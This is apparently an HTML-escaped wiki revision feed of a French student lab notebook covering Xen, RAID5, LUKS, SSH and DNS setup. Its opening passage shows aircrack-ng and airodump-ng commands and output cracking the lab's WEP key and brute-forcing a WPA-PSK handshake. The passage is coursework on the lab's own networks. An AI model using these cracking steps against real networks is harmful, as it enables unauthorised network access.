Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
Nous refaisons les mêmes actions que pour le crackage de clef WEP.&lt;br /&gt;
Cette fois nous essayons de cracker la clef WPA sur cracotte03.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wpa wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 13 -w crackWPA wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng -w dico.txt crackWPA-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous avons lancé ceci sur le eeePC qui a une vitesse de traitement 5 fois inférieure à celle d'une zabeth environ (environ 5h de traitement). Puis nous obtenons le résultat suivant:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                   Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [04:32:42] 12399908 keys tested (759.63 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399903 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 33 2B 69 DD 95 0A 5A E0 01 22 7E FF 98 DA 99 87 &lt;br /&gt;
                       40 7A CB CC 8A E5 32 9F FE 4E 5C 44 91 38 13 93 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 70 EE 27 96 5B 34 B5 4F 06 A1 F2 B6 A7 16 1E 21 &lt;br /&gt;
                       7A 0B BD F4 13 67 5B 4C ED 30 A9 0D 91 E3 F9 7F &lt;br /&gt;
                       88 E6 12 68 9C 77 4B 48 EB 5E 6A 5A DD 1D D9 08 &lt;br /&gt;
                       36 40 94 7D B4 05 80 B2 60 FA 84 81 50 CE DC 87 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 83 03 24 AC 39 AB 67 E7 7B C4 40 E8 6B 6D 7D 47 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Réalisations ===&lt;br /&gt;
==== Sécurisation des données ====&lt;br /&gt;
&lt;br /&gt;
Nous créons d'abord 3 nouvelles partitions, que nous associons à notre VM en modifiant le fichier GreenArrow.cfg :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-1 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-2 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-3 -v&lt;br /&gt;
&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-1,xvdd,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-2,xvde,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-3,xvdf,w',&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite installer mdadm :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install mdadm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avions une erreur à propos du subsystem. Pour que cela fonctionne, il nous manquait la commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install linux-image-3.16.0-4-amd64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de la machine, nous créons le volume /dev/md0:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 0&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis nous sauvons cette dernière afin de conserver md0:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mkfs /dev/md0&lt;br /&gt;
root@GreenArrow:~# mkdir /datamd0&lt;br /&gt;
root@GreenArrow:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être surs que la partition soit encore montée après le reboot:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/dev/md0 /datamd0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/datamd0# vim testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous mettons en commentaire la 2ème partition dans le fichier de conf, puis redémarrons la machine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/datamd0# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon Nov 28 13:20:27 2016&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 4&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       2       0        0        2      removed&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# ls /datamd0/&lt;br /&gt;
testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours:&lt;br /&gt;
Suppression de la partition xvdf:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --set-faulty /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --remove /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La partition est bien supprimée:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remet la partition:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --add /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On peut ensuite constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===&amp;gt;.................]  recovery = 18.2% (191112/1047552) finish=0.4min speed=31852K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 20.0% (210764/1047552) finish=0.4min speed=30109K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 21.8% (229836/1047552) finish=0.4min speed=32833K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.6% (626140/1047552) finish=0.2min speed=29816K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.3% (989688/1047552) finish=0.0min speed=30124K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# [  446.720069] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous vérifions grâce à Gparted que la carte SD fournie comporte une seule partition.&lt;br /&gt;
Une fois ce test passé, nous regardons grâce à dmesg où est localisé la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# dmesg&lt;br /&gt;
[...]&lt;br /&gt;
[1126726.403767] mmcblk1: mmc1:59b4 NCard 14.7 GiB&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre carte SD se situe donc sur /dev/mmcblk1.&lt;br /&gt;
Nous faisons donc un chiffrage AES avec un hashage SHA256 de la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons alors renseigner un mot de passe pour crypter la clef.&lt;br /&gt;
Ensuite, nous ouvrons la partition Luks, puis nous formatons la carte :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
root@zebrasoma:/# mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous montons la partition, puis créons un fichier sur la carte :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
root@zebrasoma:/# vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons la carte SD et fermons la partition Luks :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# umount /mnt&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksClose crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous essayons ensuite d'accéder à la carte SD. En renseignant un mauvais mot de passe, une erreur apparaît.&lt;br /&gt;
Cependant, une fois le bon mot de passe renseigné, tout re-devient possible.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;br /&gt;
&lt;br /&gt;
==== Configuration d'un PCBX ====&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=35762</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=35762"/>
				<updated>2016-12-08T10:18:24Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Cryptage de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tâche particulière ==&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Travail commun ==&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=GreenArrow --ip=193.48.57.162 --netmask=255.255.255.240 --gateway=193.48.57.172&lt;br /&gt;
  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Modification du fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-home -v&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-var -v&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-home,xvdc,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-var,xvdb,w',&lt;br /&gt;
              ]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle nous avons configuré le fichier sshd_config (changement de la ligne PubkeyAuthentication) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
RSAAuthentication yes&lt;br /&gt;
PubkeyAuthentication yes&lt;br /&gt;
#AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:~# service ssh restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite réussi à nous connecter en SSH sur notre VM:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
jjoignau@weppes:~$ ssh root@193.48.57.162&lt;br /&gt;
root@193.48.57.162's password: &lt;br /&gt;
&lt;br /&gt;
The programs included with the Debian GNU/Linux system are free software;&lt;br /&gt;
the exact distribution terms for each program are described in the&lt;br /&gt;
individual files in /usr/share/doc/*/copyright.&lt;br /&gt;
&lt;br /&gt;
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent&lt;br /&gt;
permitted by applicable law.&lt;br /&gt;
Last login: Mon Nov  7 10:06:49 2016&lt;br /&gt;
root@GreenArrow:~# exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous modifions le fichier '''named.conf.local''' pour créer les zones nécessaires :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;jjlddelamuerto.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.57.48.193.in-addr.arpa&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les fichiers '''db.jjlddelamuerto.space''' et '''db.57.48.193.in-addr.arpa''' :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      ns.jjlddelamuerto.space. &lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
ns      IN      A       193.48.57.162&lt;br /&gt;
www     IN      A       193.48.57.162&lt;br /&gt;
@       IN      A       193.48.57.162&lt;br /&gt;
ns      IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
www     IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
@       IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                        2016113007      ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns.jjlddelamuerto.space.&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns2.gandi.net.&lt;br /&gt;
&lt;br /&gt;
162                             IN      PTR     jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite le fichier /etc/resolv.conf afin de passer par notre serveur :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
search jjlddelamuerto.space&lt;br /&gt;
nameserver 193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous vérifions notre configuration :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# host www.jjlddelamuerto.space&lt;br /&gt;
www.jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
www.jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/bind# host -tany jjlddelamuerto.space&lt;br /&gt;
jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
jjlddelamuerto.space has SOA record ns.jjlddelamuerto.space. root.jjlddelamuerto.space. 2016113007 604800 86400 2419200 604800&lt;br /&gt;
jjlddelamuerto.space name server ns6.gandi.net.&lt;br /&gt;
jjlddelamuerto.space name server ns.jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
